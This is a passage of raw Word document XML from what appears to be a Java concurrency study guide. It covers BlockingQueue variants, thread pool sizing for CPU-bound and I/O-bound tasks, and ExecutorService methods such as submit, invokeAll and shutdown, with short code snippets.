    </w:p>
    <w:p w14:paraId="2BAF656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bounded blocking queue where the capacity is fixed and set during initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1A9F0"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backed by an array, and it is useful when you want to limit the number of pending tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40711249"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block threads when the queue is full and will prevent new tasks from being added if the capacity is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0C85E" w14:textId="06830038"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue&lt;Runnable&gt; queue = new ArrayBlockingQueue&lt;&gt;(100</w:t>
      </w:r>
      <w:r w:rsidR="002675F2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>); /</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/ Fixed capacity of 100 tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DECF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Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3799611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that does not store any tasks. It directly hands over the task from the submitter to the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F0F52"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ful for high-throughput situations where you don’t need to store the tasks, and each task is handled by a thread immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B6D5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Queue has a capacity of zero, so tasks can only be executed when threads are available to consume them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11413595" w14:textId="37FE60B2" w:rsidR="00734603" w:rsidRPr="00CE4B95"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nchronousQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3582D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8A29A"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where tasks are ordered based on their priority rather than the order in which they are submitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2F8D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asks are submitted with priority information, this queue will process higher-priority tasks first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F64503" w14:textId="6FAFF8F5" w:rsidR="003646F6" w:rsidRPr="00CE4B95"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orityBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586AF3E4"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It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B648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a task is submitted to the executor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The ThreadPoolExecutor puts the task into the queue (like a BlockingQueue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED05D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election</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a worker thread is idle or available, it takes the task from the queue and executes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0688D6"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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the queue is full, the BlockingQueue will block the submitter until space is available (in the case of a bounded queue). Similarly, threads will wait if the queue is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC5142"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2E029A"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0F26AC4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9AC13EE"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ThreadPoolExecutor</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3985802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queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519156B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B7A2EF"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F2947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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Submit tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F36C424"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1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492BDB4" w14:textId="53F20C6E"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2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13084326"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F04D41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like LinkedBlockingQueue, ArrayBlockingQueue, SynchronousQueue, etc.) is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to store the tasks waiting to be executed in a ThreadPoolExecutor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3749FEB4"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xact implementation of the queue may vary depending on whether you want to limit the queue size, prioritize tasks, or handle concurrent task submissions efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F276AFB" w14:textId="6BB6D118" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CA708F">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6A5C22FA">
          <v:rect id="_x0000_i1847" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5232950C" w14:textId="77777777" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00096260" w:rsidP="00CA708F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEA208A" w14:textId="000CE971" w:rsidR="00423158" w:rsidRPr="00CE4B95" w:rsidRDefault="00423158">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="291" w:name="_Toc197867505"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">When we </w:t>
      </w:r>
      <w:r w:rsidR="004D37A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a Thread Pool Executor so what will be the ideal count</w:t>
      </w:r>
      <w:r w:rsidR="004D37A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>, how many thread we should keep in it</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w14:paraId="24E888E6" w14:textId="35EBFDCA" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F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deal thread count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for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CE4B95"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siderations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE4DA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bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142507C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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equal to the number of CPU cores</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F89FB"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you have a 4-core CPU, a thread pool of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4 threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76712D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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more threads than the number of CPU cores</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B80961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common guideline is to have a thread pool size of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>N + (N / 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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eneral Guidelines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F18AA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CPU-bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Set the pool size to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number of available CPU cores</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Runtime.getRuntime().availableProcessors()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E995E4" w14:textId="77777777" w:rsidR="003144C5" w:rsidRPr="00CE4B95" w:rsidRDefault="003144C5" w:rsidP="003525F3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5039765F"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6DC1433C" w14:textId="08F4E4D1"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06D26264"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I/O-bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: You can increase the thread pool size. A common rule is to set the pool size to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 especially if tasks are blocking on I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E667F5"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4158165" w14:textId="749EEDC6"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19D79DD6"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itional Factors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCED12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Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3A26F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running tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the tasks are short-lived, you might get away with a smaller pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF5F0A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ng-running tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA6BB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etup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7EB2FD"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DA586EC"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oolSiz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I/O-bound tasks, or you can adjust based on testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236050B"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5D6C53C1"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p>
    <w:p w14:paraId="71F224A1" w14:textId="1C91D93E"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080168AB" w14:textId="77777777" w:rsidR="009E5A01" w:rsidRPr="00CE4B95" w:rsidRDefault="009E5A01" w:rsidP="003525F3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F213906" w14:textId="5315D7B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itoring and Tuning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38959876"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nchmarking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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BA39C9A"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PU-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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I/O-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tasks: Set the thread pool size to around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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500956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CE4B95"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8" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB8B4F"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92" w:name="_Toc197867506"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are thread pool methods?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="292"/>
    </w:p>
    <w:p w14:paraId="2FCA7FF3" w14:textId="041DE9E7" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Common Thread Pool Methods in Java (from ExecutorService interface):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E660E66"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ubmit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C431A65"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s used to submit a task (usually a Runnable or Callable) for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35588F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2A5E9D6B"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4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC9E75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Future&lt;?&gt; future = executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDBE49"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 xml:space="preserve">    // Task to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5039FF1D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCDA78"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nvokeAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E560CC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takes a collection of tasks (like a list of Callable objects) and executes them. It blocks until all the tasks are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163415D1"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List&lt;Future&lt;T&gt;&gt;: A list of Future objects representing the results of the submitted tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735B44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251572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5589C484"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144E920"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6BB03D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632300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Future&lt;Integer&gt;&gt; results = executor.invokeAll(tasks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C5D4F4"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lastRenderedPageBreak/>
        <w:t>invokeAny()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508773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T: The result of the first completed task (if successful).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDD11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677C7996"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2D515BD7"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53D139C"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33260C9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55BE7458"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teger result = executor.invokeAny(tasks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06822C3D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7D296"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nitiates an orderly shutdown in which previously submitted tasks are executed, but no new tasks will be accepted. It does not immediately stop the executing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86A7B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Typically called when you want to terminate the executor and release resources once all tasks are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADC44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4F3852F2" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="3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3ED2E49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Now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B98EE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attempts to stop all actively executing tasks, halts the processing of waiting tasks, and returns a list of the tasks that were waiting to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7A10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Use this method when you need to shut down the thread pool immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE861D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FFED4EB"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Runnable&gt; pendingTasks = executor.shutdownNow();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B045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Shutdown()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922C76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if the thread pool has been shut down (i.e., no new tasks will be accepted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164800E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executor has been shut down, false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6356580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027C0FC4"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shutdownStatus = executor.isShutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C75720C"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Terminated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A517C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whether all tasks have completed following a shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DB0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all tasks have completed after shutdown, false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE0B1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5ED4F46"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terminatedStatus = executor.isTerminated();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06EDF2"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awaitTermination()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E33B9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blocks the calling thread until all tasks have completed execution after a shutdown, or until the specified timeout occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087333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Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686EA4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imeout: The maximum time to wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D7728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unit: The time unit of the timeout argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245258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tasks completed within the timeout, false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06105E9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D09FB22"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42F4223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finished = executor.awaitTermination(60, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD264AA" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00000000" w:rsidP="00D50B0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DBAF">
          <v:rect id="_x0000_i1849" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C93D0"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Thread Pool Methods Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F8C66"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ubmit(): Submits a task for execution and returns a Future object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669E5DE"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ll(): Submits a collection of tasks and blocks until all of them are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A45410"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ny(): Submits a collection of tasks and returns the result of the first completed task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16399832"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 Initiates an orderly shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A907A5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Now(): Attempts an immediate shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B28D6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Shutdown(): Checks if the thread pool is shut down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7D043"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Terminated(): Checks if all tasks have been completed after shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D4905"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awaitTermination(): Blocks the calling thread until all tasks are completed or the timeout expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375724E0" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:p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ese methods allow you to manage, monitor, and control the execution of tasks in a thread pool efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DA84B" w14:textId="24B2F402"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77F9639">
          <v:rect id="_x0000_i1850" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582D5E9"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93" w:name="_Toc197867507"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create threads in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="293"/>
    </w:p>
    <w:p w14:paraId="24F73C90" w14:textId="0A9513B0" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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n Java, there are two primary ways to create and run threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB178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1. By Extending the Thread class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F22B7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first way to create a thread is by extending the Thread class and overriding its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E9E70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155018B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new class that extends the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFCD1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Override the run() method to define the task that the thread should perform.</w:t>
      </w:r>
    </w:p>
